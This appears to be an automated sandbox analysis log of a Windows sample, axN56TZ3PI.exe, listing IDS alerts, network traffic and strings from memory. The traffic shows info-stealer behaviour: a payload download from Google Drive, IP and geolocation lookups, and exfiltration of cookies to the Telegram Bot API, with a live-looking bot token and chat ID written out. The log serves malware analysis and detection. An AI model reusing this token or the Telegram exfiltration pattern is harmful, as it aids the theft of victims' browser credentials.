            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49729 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49732 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49725 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49727 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49730 -> 104.21.64.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ivLDAHuepFQ0Eiv_QNfq2F2eHEBNobhp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1ivLDAHuepFQ0Eiv_QNfq2F2eHEBNobhp&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.11.20:49724 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ivLDAHuepFQ0Eiv_QNfq2F2eHEBNobhp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1ivLDAHuepFQ0Eiv_QNfq2F2eHEBNobhp&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2007/03/2025%20/%2016:28:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME/sendDocument?chat_id=7160883909&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5d95116c0067Host: api.telegram.orgContent-Length: 2073
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 21:28:12 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: axN56TZ3PI.exe, 0000000C.00000002.6021727103.0000000070F81000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
            Source: axN56TZ3PI.exe, 0000000C.00000003.2126410147.0000000007A78000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126554046.0000000007A78000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2164090884.0000000007A74000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6005311017.0000000007A72000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2416797592.0000000007A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: axN56TZ3PI.exe, 0000000C.00000003.2126410147.0000000007A78000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126554046.0000000007A78000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2164090884.0000000007A74000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6005311017.0000000007A72000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2416797592.0000000007A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: axN56TZ3PI.exe, axN56TZ3PI.exe, 0000000C.00000002.5983190270.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: axN56TZ3PI.exe, 00000000.00000002.2038365787.0000000000409000.00000004.00000001.01000000.00000003.sdmp, axN56TZ3PI.exe, 00000000.00000000.905869776.0000000000409000.00000008.00000001.01000000.00000003.sdmp, axN56TZ3PI.exe, 0000000C.00000002.5983190270.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: axN56TZ3PI.exe, 0000000C.00000003.2126410147.0000000007A78000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126554046.0000000007A78000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2164090884.0000000007A74000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6005311017.0000000007A72000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2416797592.0000000007A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: axN56TZ3PI.exe, 0000000C.00000003.2126524447.0000000007ABB000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126410147.0000000007A78000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126554046.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
            Source: axN56TZ3PI.exe, 0000000C.00000002.6015919161.00000000381A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: axN56TZ3PI.exe, 0000000C.00000002.6015919161.00000000381A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en$
            Source: axN56TZ3PI.exe, 0000000C.00000002.6015919161.000000003819B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBFr
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
            Source: axN56TZ3PI.exe, 0000000C.00000003.2164090884.0000000007A74000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6005311017.0000000007A72000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2416797592.0000000007A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: axN56TZ3PI.exe, 0000000C.00000003.2126524447.0000000007ABB000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126410147.0000000007A78000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6005311017.0000000007A4F000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6005311017.0000000007A47000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126554046.0000000007A78000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2164090884.0000000007A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ivLDAHuepFQ0Eiv_QNfq2F2eHEBNobhp&export=download
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000390B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000390B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000390B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
            Source: axN56TZ3PI.exe, 0000000C.00000002.6015919161.00000000382B5000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6015919161.00000000382B7000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6015919161.00000000382A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: axN56TZ3PI.exe, 0000000C.00000002.6015919161.00000000382B5000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6015919161.00000000382A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: axN56TZ3PI.exe, 0000000C.00000002.6015919161.00000000382B5000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6015919161.00000000382A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: axN56TZ3PI.exe, 0000000C.00000003.2126410147.0000000007A78000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126554046.0000000007A78000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2164090884.0000000007A74000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6005311017.0000000007A72000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2416797592.0000000007A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392CD000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392CD000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039441000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039429000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000393F3000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039297000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.000000003921E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392CD000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt/
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txtD
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392CD000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com/
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039441000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000393F3000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039297000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.000000003921E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com;
            Source: axN56TZ3PI.exe, 0000000C.00000003.2126524447.0000000007ABB000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126410147.0000000007A78000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126554046.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
            Source: axN56TZ3PI.exe, 0000000C.00000002.6015919161.0000000038372000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6015919161.00000000382B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000390B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000390B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039441000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000393F3000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039297000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.000000003921E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392CD000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
            Source: axN56TZ3PI.exe, 0000000C.00000003.2126524447.0000000007ABB000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126410147.0000000007A78000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126554046.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: axN56TZ3PI.exe, 0000000C.00000003.2126524447.0000000007ABB000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126410147.0000000007A78000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126554046.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392CD000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039441000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039429000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000393F3000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039297000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.000000003921E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039429000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000393F3000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039297000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.000000003921E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000390B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039429000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000393F3000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039297000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.000000003921E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=eicar
            Source: axN56TZ3PI.exe, 0000000C.00000003.2126524447.0000000007ABB000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126410147.0000000007A78000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126554046.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: axN56TZ3PI.exe, 0000000C.00000003.2126524447.0000000007ABB000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126410147.0000000007A78000.00000004.00000020.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000003.2126554046.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.0000000039277000.00000004.00000800.00020000.00000000.sdmp, axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000392D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
            Source: axN56TZ3PI.exe, 0000000C.00000002.6015919161.00000000381CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBFr
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
